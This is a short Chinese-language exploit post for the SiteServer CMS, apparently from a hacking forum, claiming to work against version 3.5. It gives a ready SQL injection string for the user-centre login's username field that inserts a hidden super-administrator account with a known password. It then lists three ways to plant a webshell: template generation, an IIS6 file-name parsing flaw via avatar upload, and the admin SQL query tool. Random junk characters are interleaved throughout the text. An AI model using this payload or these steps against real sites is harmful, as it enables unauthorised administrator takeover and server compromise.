经测试秒杀最新的3.5版, ~7 H: \7 b. l; p
stieserver官网:www.siteserver.cn1 S9 c- m5 F% E P- Z
EXP:$ r0 V7 i' z6 w; C. Y0 s
直接访问UserCenter/login.aspx @( X7 Q( Q* s1 t6 j' F
用户名处输入:
" H9 V/ @* u9 t" C
9 {, F4 V) K5 B123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
: {3 z8 Y* D6 B密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。5 @3 v' |4 r9 x# q: F
之后再访问后台SiteServer/login.aspx用插入的用户登陆
7 g7 I) M$ S$ S# t1 S; }7 S; [后台拿webshell的三种方法:- w1 X2 J' Q4 {2 J# ]
一、
/ t( b3 E( X% k站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
& Q0 Y0 v1 [- e" {5 i$ \) f二、
6 C W! f. Z6 L" A' `成员权限-》添加用户-》用户名为:1.asp* Y0 T! m$ q2 Q0 O3 e7 i
http://127.0.0.1/usercenter/' K# E" V N4 E
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
, b6 F3 O! r1 |& I M(ps:后台添加用户时不会验证是否含有非法字符)) o7 D* Y* M5 @5 I. {6 B
三、; e5 b. _, q+ G4 _
系统工具-》实用工具-》机器参数查看
& i' @8 `# P+ T- P可以看到数据库类型、名称,WEB路径# ~( a' M& o. D2 I- Z
系统工具-》数据库工具-》SQL语句查询* ~# ]- d: Z" R# `( F" O; ]
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |